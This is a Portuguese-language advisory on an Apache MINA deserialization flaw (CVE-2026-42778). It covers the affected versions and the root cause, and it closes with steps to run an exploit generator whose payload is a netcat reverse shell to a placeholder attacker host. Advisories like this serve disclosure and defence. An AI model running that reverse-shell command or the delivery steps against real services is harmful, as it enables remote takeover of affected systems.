
CVE-2026-42778 EUVD-2026-26492 Desserialização de Dados Não Confiáveis (CWE-502)
Correção incompleta no método AbstractIoBuffer.getObject() do Apache MINA. A validação da lista de permissões de nomes de classes, que restringe quais classes podem ser desserializadas, é aplicada tarde demais, após os inicializadores estáticos nas classes em leitura já terem sido executados. Isso ocorre porque a correção original para a CVE-2024-52046 não foi aplicada corretamente aos ramos 2.1.X e 2.2.X. Versões afetadas: - Apache MINA 2.1.0 até 2.1.11 - Apache MINA 2.2.0 até 2.2.6
ID da CVE: CVE-2026-42778
Publicada: 05/01/2026
Impacto: Crítico
Disponibilidade do Exploit: Não público, apenas privado.
CVSS: 9.8
Patch Disponível: (Nenhum patch oficial ainda)
Um atacante pode criar objetos serializados maliciosos que, ao serem processados por IoBuffer.getObject(), executam código arbitrário por meio de inicializadores estáticos antes que a validação da lista de permissões de nomes de classes ocorra. Como esta é uma vulnerabilidade acessível pela rede que não exige privilégios ou interação do usuário, a execução remota de código é possível em qualquer aplicação que use Apache MINA e chame o método IoBuffer.getObject(). A vulnerabilidade permite o comprometimento total da confidencialidade, integridade e disponibilidade dos sistemas afetados.
# Compilar e gerar
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# Enviar pela rede para o serviço baseado em MINA usando ObjectSerializationCodecFactory
# ou qualquer endpoint que chame IoBuffer.getObject()